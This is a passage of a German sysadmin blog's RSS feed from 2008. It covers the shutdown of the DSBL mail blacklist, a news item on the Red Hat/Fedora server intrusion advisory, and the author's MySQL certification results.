		<description><![CDATA[Alle Mailserveradmins, die DNS-Blacklisten im Einsatz haben, sollten diese schnell überprüfen und den Eintrag rausnehmen, da dnsbl aufhört. Hintergrund: es gab im juni einen Crash und die Tools und Daten konnten nicht wiederhergestellt werden, sodass die Liste nun doch endgültig aufgibt, statt alles neu aufzubauen. In der Vergangenheit ist es schon vorgekommen, dass von Listen [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Alle Mailserveradmins, die DNS-Blacklisten im Einsatz haben, sollten diese schnell überprüfen und den Eintrag rausnehmen, da <a HREF="http://www.dsbl.org/">dnsbl</a> aufhört. Hintergrund: es gab im juni einen Crash und die Tools und Daten konnten nicht wiederhergestellt werden, sodass die Liste nun doch endgültig aufgibt, statt alles neu aufzubauen.<br />
In der Vergangenheit ist es schon vorgekommen, dass von Listen nach Betriebsende einfach alles geblacklistet wird, sodass garkein Mailverkehr mehr stattfinden kann, also Vorsicht!</p>
<p><!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/dsblorg-down/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Einbr&#252;che in Fedora und Redhat Server</title>
		<link>http://www.adminlife.net/hacks/einbrueche-in-fedora-und-redhat-server/</link>
		<comments>http://www.adminlife.net/hacks/einbrueche-in-fedora-und-redhat-server/#comments</comments>
		<pubDate>Fri, 22 Aug 2008 17:51:58 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[adminlife]]></category>
		<category><![CDATA[hacks]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=839</guid>
		<description><![CDATA[Eventuell habt ihr schon davon gelesen, es wurde in diverse Red Hat und Fedora Server eingebrochen. Laut RHSA-2008-0855 hat der Angreifer seinen Zugriff genutzt, um veränderte OpenSSH Pakete zu signieren. Autsch. Laut der Meldung ist man nicht in Gefahr, wenn man das &#8220;Red Hat Network&#8221; zum Updaten seiner Pakete benutzt. Leider gibt es keine Informationen [...]]]></description>
			<content:encoded><![CDATA[<p align="justify"><img class="alignnone size-thumbnail wp-image-840" src="http://www.adminlife.net/wp-content/uploads/2008/08/98-101-150x150.jpg" alt="" width="150" height="150" align="right" />Eventuell habt ihr schon davon gelesen, es wurde in diverse Red Hat und Fedora Server eingebrochen. Laut <a href="http://rhn.redhat.com/errata/RHSA-2008-0855.html">RHSA-2008-0855</a> hat der Angreifer seinen Zugriff genutzt, um veränderte OpenSSH Pakete zu signieren. Autsch. Laut der Meldung ist man nicht in Gefahr, wenn man das &#8220;Red Hat Network&#8221; zum Updaten seiner Pakete benutzt.</p>
<p>Leider gibt es keine Informationen darüber, wie die Angreifer die Server gehackt haben, wer etwas darüber weiß, möge hier bitte kommentieren!<!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/hacks/einbrueche-in-fedora-und-redhat-server/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Certified MySQL Database Administrator (CMDBA I &amp; II)</title>
		<link>http://www.adminlife.net/allgemein/certified-mysql-database-administrator-cmdba-i-ii/</link>
		<comments>http://www.adminlife.net/allgemein/certified-mysql-database-administrator-cmdba-i-ii/#comments</comments>
		<pubDate>Thu, 14 Aug 2008 16:46:47 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=812</guid>
		<description><![CDATA[&#8230;bin ich nun auch noch! HurraÃ‚Â²! Ich habe heute beide Prüfungen nacheinander sehr gut bestanden (und jeweils in einem Drittel der Zeit) und lehne mich nach dem Zertifikatsmarathon nun erstmal in Ruhe zurück. Nächste Woche gibt es erstmal Urlaub! Eigentlich fehlt mir noch der Cluster Administrator&#8230; Vorher ist aber wohl noch mein Hasskanidat LPIC-202 dran.]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.mysql.de/common/logos/logo_mysql_sun.gif" alt="" align="right" /></p>
<p align="justify">&#8230;bin ich nun auch noch! HurraÃ‚Â²! Ich habe heute beide Prüfungen nacheinander sehr gut bestanden (und jeweils in einem Drittel der Zeit) und lehne mich nach dem Zertifikatsmarathon nun erstmal in Ruhe zurück. Nächste Woche gibt es erstmal Urlaub! Eigentlich fehlt mir noch der Cluster Administrator&#8230; <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  Vorher ist aber wohl noch mein Hasskanidat LPIC-202 dran. <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> <!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/certified-mysql-database-administrator-cmdba-i-ii/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>CMA &#8211; Certified MySQL Associate</title>
		<link>http://www.adminlife.net/allgemein/cma-certified-mysql-associate/</link>
		<comments>http://www.adminlife.net/allgemein/cma-certified-mysql-associate/#comments</comments>
		<pubDate>Wed, 13 Aug 2008 16:09:50 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=810</guid>
		<description><![CDATA[&#8230;bin ich seit heute morgen! Hurra! Ok, wahnsinnig schwer war es nicht, in 3 der 6 Bereiche hatte ich sogar 100%, wirklich schlecht war ich aber bei den SQL-Fragen, die wohl eher für die Anwendungsentwickler gedacht waren. Naja egal, wieder ein Schein mehr!]]></description>
			<content:encoded><![CDATA[<p><img SRC="http://www.mysql.de/common/logos/logo_mysql_sun.gif" align="right">
<p ALIGN="justify">
&#8230;bin ich seit heute morgen! Hurra! Ok, wahnsinnig schwer war es nicht, in 3 der 6 Bereiche hatte ich sogar 100%, wirklich schlecht war ich aber bei den SQL-Fragen, die wohl eher für die Anwendungsentwickler gedacht waren. Naja egal, wieder ein Schein mehr! <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/cma-certified-mysql-associate/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
	</channel>
</rss>

<!-- Dynamic page generated in 4.079 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2012-02-04 17:13:00 -->

